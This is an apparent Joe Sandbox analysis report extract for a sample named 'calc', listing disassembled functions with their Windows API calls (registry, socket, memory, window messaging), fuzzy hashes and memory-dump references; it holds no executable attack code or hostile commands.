Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: daf0ff7e96761f6d101a695ae533b38d38fb8ff934d62b7ca8e466a06cf05df1
Instruction ID: f0777e9540ddcf14f99e18fd38f2961c8e9e3acc4c0c3b114796979fdd6f36af
Opcode Fuzzy Hash: daf0ff7e96761f6d101a695ae533b38d38fb8ff934d62b7ca8e466a06cf05df1
Instruction Fuzzy Hash: 5F5189B1D0028AAFAF209F94CD848BFB7BAEB45314B26453FE51196250D734AD44CB69

Function 0043C3F2 Relevance: 7.7, APIs: 5, Instructions: 151registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,00000000,00000000), ref: 0043C499
RegOpenKeyExW.ADVAPI32(00000000,?,00000000,?,00000000), ref: 0043C4DE
RegEnumKeyExW.ADVAPI32(00000001,-00000001,?,000000FF,00000000,00000000,00000000,?), ref: 0043C532
RegCloseKey.ADVAPI32(00000001,?), ref: 0043C56B

Part of subcall function 0041FE6D: GetLastError.KERNEL32(00000000,0047C7A0,00000FFF,00000000,00430AD3), ref: 0041FE82
Part of subcall function 0041FE6D: FormatMessageW.KERNEL32(00001000,00000000,0047C7A0,00000000,0047C7A0,00000FFF,00000000,00430AD3), ref: 0041FE96

RegCloseKey.ADVAPI32(00000000), ref: 0043C579

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Close$ConnectEnumErrorFormatLastMessageOpenRegistry
String ID:
API String ID: 2844598385-0
Opcode ID: 79d8a1356644622c004dde99381a4694f708576a429563848669301cf1acc8f1
Instruction ID: ca18b23deec50a713599ee99bd298669572856c6e0ae2ddf99e87897c19de7b6
Opcode Fuzzy Hash: 79d8a1356644622c004dde99381a4694f708576a429563848669301cf1acc8f1
Instruction Fuzzy Hash: F1514D72800118FBCF10EFA1D8869EE7779EF18324F14455AF505A7152DB38EE85DBA8

Function 0044D560 Relevance: 7.7, APIs: 5, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8911067d0c10e8e21cd2de22e830f1243c0a77d9105b58bbc0093e8065c5e879
Instruction ID: 3f26043b1fee1b9c9fc7dfd08f39e7adaabf58cb7090512c6284b74f89030849
Opcode Fuzzy Hash: 8911067d0c10e8e21cd2de22e830f1243c0a77d9105b58bbc0093e8065c5e879
Instruction Fuzzy Hash: 99410571D00225ABFF307FA69C848AF7A64EB05318711463FF819A6292DB3D4D00CB9D

Function 0042F107 Relevance: 7.6, APIs: 5, Instructions: 142networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 0042F19C
WSAGetLastError.WS2_32(00000000,0045C6D0), ref: 0042F1A7
__WSAFDIsSet.WS2_32(00000000,00000001), ref: 0042F1D1
_strlen.LIBCMT ref: 0042F227

Part of subcall function 0041684E: _strlen.LIBCMT ref: 0041685F
Part of subcall function 0041684E: MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,0047BD30,?,?,00410545,00000000), ref: 00416879
Part of subcall function 0041684E: MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0047BD30,?,?,00410545,00000000), ref: 00416898

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ByteCharMultiWide_strlen$ErrorLastselect
String ID:
API String ID: 3011618667-0
Opcode ID: 8740fd59fb79ba9ee8805b8c3b106299e716106ab90322acfc2372d10890ddfd
Instruction ID: 49a0b57b1716e881498c6cccfb7f5a7b1c7207353685988fd0dcfc9e43c18dba
Opcode Fuzzy Hash: 8740fd59fb79ba9ee8805b8c3b106299e716106ab90322acfc2372d10890ddfd
Instruction Fuzzy Hash: C3410435600218EBDB20EAA5D8819EF73B8EF05324F9045BFF815D7251DB38ED448B69

Function 00426415 Relevance: 7.6, APIs: 5, Instructions: 116COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000000,?,00007FFF,?), ref: 004264A4
GetPrivateProfileSectionW.KERNEL32(00000000,?,00000003,?), ref: 004264D2
WritePrivateProfileSectionW.KERNEL32(00000000,?,?), ref: 00426512
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00426540
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0042654C

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 8f719fff5e83398928dd831625c1d3b39390cd97dfba9a082a54ed380818f0d3
Instruction ID: 090de75c44e30297ca10da119c2b442c0f809bd188c017535f1850e90268234a
Opcode Fuzzy Hash: 8f719fff5e83398928dd831625c1d3b39390cd97dfba9a082a54ed380818f0d3
Instruction Fuzzy Hash: 58418335A0022AEBDB10EB56DC44E9AB7B8FF04324F45819BE544A7641CB38FD85CF98

Function 00417AB2 Relevance: 7.6, APIs: 5, Instructions: 108sleepCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(004783F4), ref: 00417ADC
InterlockedDecrement.KERNEL32(004783F4), ref: 00417AED
Sleep.KERNEL32(0000000A,?,?), ref: 00417AF5
InterlockedIncrement.KERNEL32(004783F4), ref: 00417AFC
InterlockedDecrement.KERNEL32(004783F4), ref: 00417BF6

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Interlocked$DecrementIncrement$Sleep
String ID:
API String ID: 327565842-0
Opcode ID: 90fc57a381e00715e35afd465dc5a8ff7c57ea430ae1844c7da5232fb6eedf94
Instruction ID: e540b121462b817b5aae6ec427a49763a98f73807a2fb50418b342084706f20a
Opcode Fuzzy Hash: 90fc57a381e00715e35afd465dc5a8ff7c57ea430ae1844c7da5232fb6eedf94
Instruction Fuzzy Hash: FE41AF32804106DFDB04DF68DD45AEE73B4EF44349B11402EE919A7262DB39AE85CBD8

Function 0044C70C Relevance: 7.6, APIs: 5, Instructions: 99COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000009,00420EA3,000000FF,?,00000028,00000000,004184C3,00000000,?,?,0044C82E,?,?,?,?), ref: 0044C771
GetLastError.KERNEL32(?,?,0044C82E,?,?,?,?,00449209,004184C3,?,00000028,00420EA3,?,004783F4,00000000), ref: 0044C77B
MultiByteToWideChar.KERNEL32(00000000,00000001,00420EA3,00420EA3,?,00000028,?,?,0044C82E,?,?,?,?,00449209,004184C3,?), ref: 0044C7D0
_strlen.LIBCMT ref: 0044C7E3
MultiByteToWideChar.KERNEL32(00000000,00000009,00420EA3,000000FF,00000000,00000000,00000000,004184C3,00000000,?,?,0044C82E,?,?,?,?), ref: 0044C7F7

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_strlen
String ID:
API String ID: 1602738612-0
Opcode ID: eba79e8160cde25b70985ce8e81dd59c05e2ed59557b5e24ec2982564c7b595c
Instruction ID: a058c07e26b641bbfc192da87883db441c84c92e3ac80c53c66dc71070b0c3ca
Opcode Fuzzy Hash: eba79e8160cde25b70985ce8e81dd59c05e2ed59557b5e24ec2982564c7b595c
Instruction Fuzzy Hash: 3031037060221AAFFB619F25CCC4A7B7B65FF01765F284126F551962A1C378CC50DBA8

Function 00401CA6 Relevance: 7.6, APIs: 5, Instructions: 98sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00401CC7
PostMessageW.USER32(00000203,00000201,?), ref: 00401D88
Sleep.KERNEL32(00000000), ref: 00401D8C
PostMessageW.USER32(00000203,00000202,00000000), ref: 00401D99
Sleep.KERNEL32(00000000), ref: 00401D9D

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 7fbab86b68605c3689304c4830e95d246c56bc5e426fb2400a3c8aeb11d6a3b5
Instruction ID: 3497ea4d360e579767fbcf44d23d4e2b7884bdb53c7986785f295a9f05f9fe14
Opcode Fuzzy Hash: 7fbab86b68605c3689304c4830e95d246c56bc5e426fb2400a3c8aeb11d6a3b5
Instruction Fuzzy Hash: 81317271900219EFDF00CFA9C848ADE7BB5FF44324F11862AE824A72E0D778AA01DF54

Function 0044D99A Relevance: 7.6, APIs: 5, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0044D9B4
GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0044D9C5
VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 0044DA0B
VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 0044DA49
VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 0044DA6F

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Virtual$Query$AllocInfoProtectSystem
String ID:
API String ID: 4136887677-0
Opcode ID: 43b05488773f8ade2c74076fdcdff7ffeccff98ac9e085d27ad2e5a2c5c51133
Instruction ID: a43d628128a8e04a91b8abd909b70af1ccdebefb45351d68ac4c75b7ee95a1d4
Opcode Fuzzy Hash: 43b05488773f8ade2c74076fdcdff7ffeccff98ac9e085d27ad2e5a2c5c51133
Instruction Fuzzy Hash: C131BF72D04219EBEF10CFA4DD49AEE7BB8EB08355F140566E901F7290DB788E40DB98

Function 00406CF6 Relevance: 7.6, APIs: 5, Instructions: 86windowCOMMON

Download Yara Rule

APIs

ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00406D5C
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00406D6D
DestroyCursor.USER32(?), ref: 00406D83
SendMessageW.USER32(?,00000080,00000000,?), ref: 00406D9B
InvalidateRect.USER32(?,00000000,00000001), ref: 00406DCB

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CursorDestroyExtractIconImageInvalidateLoadMessageRectSend
String ID:
API String ID: 3808587923-0
Opcode ID: 36ff14aeb739d8a85322478fd1b35111299d01693d0169730d835306efe88b92
Instruction ID: c21ef0cf77d829efdd81d2e82e102ae9a9487c8db7f6a13140ca5d1279e7c5bd
Opcode Fuzzy Hash: 36ff14aeb739d8a85322478fd1b35111299d01693d0169730d835306efe88b92
Instruction Fuzzy Hash: D0317C71600249FFCF11DF64DC849AA7BB9FF04355B11853AF916A6290D339EDA0CB98

Function 0040850D Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 00408529
74D6A570.USER32(00000000,?,00000001,?), ref: 00408530
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000002,000000FF,000000FF,000000FF,00000001,00000004,00000000,00000002,00000000,?), ref: 00408582
SendMessageW.USER32(000000FF,00000030,00000000,00000001), ref: 00408592
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004085BA

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: A570CreateDeleteFontMessageMoveObjectSendWindow
String ID:
API String ID: 1844107694-0
Opcode ID: 87d978335de6d63e769d116ec5567d66e3bca6e5e14d1150b9a6aef3f29b13dc
Instruction ID: 7cb732dccc17f47e5e950ce36faa7ffa03e08c593cb8184f061ced94b1689c05
Opcode Fuzzy Hash: 87d978335de6d63e769d116ec5567d66e3bca6e5e14d1150b9a6aef3f29b13dc
Instruction Fuzzy Hash: F72190B2600604FFE7108FA4DD89EAB7BECEB58706F040429F642E6291D675DD40CB60

Function 0043C147 Relevance: 7.6, APIs: 5, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 0043C178
RegOpenKeyExW.ADVAPI32(000000FF,?,00000000,00000000,?), ref: 0043C1A5
RegCloseKey.ADVAPI32(?), ref: 0043C1BE
RegDeleteKeyW.ADVAPI32(000000FF,?), ref: 0043C1D3
RegEnumKeyExW.ADVAPI32(000000FF,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 0043C1FA

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Enum$CloseDeleteOpen
String ID:
API String ID: 2095303065-0
Opcode ID: 21ec9ad9b76e8ad65cf264998aa480fb6b0f153335c2455365767b880b5fc71f
Instruction ID: 7f2e3d05637b22c96f89e951353aa8dcb6cce75fb7abe0967204a5d51aea3fe2
Opcode Fuzzy Hash: 21ec9ad9b76e8ad65cf264998aa480fb6b0f153335c2455365767b880b5fc71f
Instruction Fuzzy Hash: 0B2138B290021CBEEF119BD4DC84DEF7BBCEB08344F1044A3E915E2151E2359E88ABB5

Function 0040CCF8 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 0040CD3D
ExtCreatePen.GDI32(?,?,?,00000000,00000000,?,?), ref: 0040CD84
SelectObject.GDI32(?,00000000), ref: 0040CD94
BeginPath.GDI32(?), ref: 0040CDAE
SelectObject.GDI32(?,00000000), ref: 0040CDCD

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Object$Select$BeginCreateDeletePath
String ID:
API String ID: 2338827641-0
Opcode ID: a2cbe206f2c3155c35310916aa923ddabcbc7ad77c6c104879e4775da65235ec
Instruction ID: 5f1ec3bb34c6c83378939ec44ec0e75b148177ef5afca06314bcc58f4c2b26e1
Opcode Fuzzy Hash: a2cbe206f2c3155c35310916aa923ddabcbc7ad77c6c104879e4775da65235ec
Instruction Fuzzy Hash: 2C213171500705EFDB249F68D8C45DBBBB9EF54321B508A3AE566A32D0D734A9408B64

Function 0041553B Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(0041568E,?,?,?,0041568E,?), ref: 00415558
GetLastError.KERNEL32(?,?,?,0041568E,?), ref: 00415563
CreateDirectoryW.KERNEL32(0041568E,00000000,?,?,?,0041568E,?), ref: 00415577
_wcsrchr.LIBCMT ref: 0041558F
CreateDirectoryW.KERNEL32(0041568E,00000000,00000000,0041568E,?), ref: 004155C4

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsrchr
String ID:
API String ID: 4258345607-0
Opcode ID: 176f42ab5fbc2667039750e6cd929b224dd4fd0784e740c7c288cb1e263e08a6
Instruction ID: 68b5fae6650556f5f289766cde6e66e8d758d6bde98e903a2f07c94c38581993
Opcode Fuzzy Hash: 176f42ab5fbc2667039750e6cd929b224dd4fd0784e740c7c288cb1e263e08a6
Instruction Fuzzy Hash: FE010432042F11F9E62127269C42BFF279F9F93364F60001BF805DA1D6EB2C8D82922D

Function 0042F316 Relevance: 7.6, APIs: 5, Instructions: 66networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 0042F363
WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 0042F371
connect.WS2_32(00000000,?,00000010), ref: 0042F388
WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 0042F396
closesocket.WS2_32(00000000), ref: 0042F3A5

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ErrorLast$closesocketconnectsocket
String ID:
API String ID: 2203635173-0
Opcode ID: bcc0c9b2420f326353bda6227fe542d88106e93c1212bbe37af0a85f72262368
Instruction ID: e9a76509ebc0cdc0cc0ded18a06fd8c0235db7b6e9999a3bcc64bfd8e966fb5a
Opcode Fuzzy Hash: bcc0c9b2420f326353bda6227fe542d88106e93c1212bbe37af0a85f72262368
Instruction Fuzzy Hash: 5D11E6317001246BDB00FA26DC02AAE6379AF40728FE4417EFC15AB2C2DA28DD47929D

Function 0040D713 Relevance: 7.6, APIs: 5, Instructions: 56windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(00000030,?), ref: 0040D722
SendMessageW.USER32(00000000,00000087,00000000,00000000), ref: 0040D73E
SendMessageW.USER32(?,00000087,00000000,00000000), ref: 0040D75F
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040D76D
SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 0040D779

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessageSend$Item
String ID:
API String ID: 3888421826-0
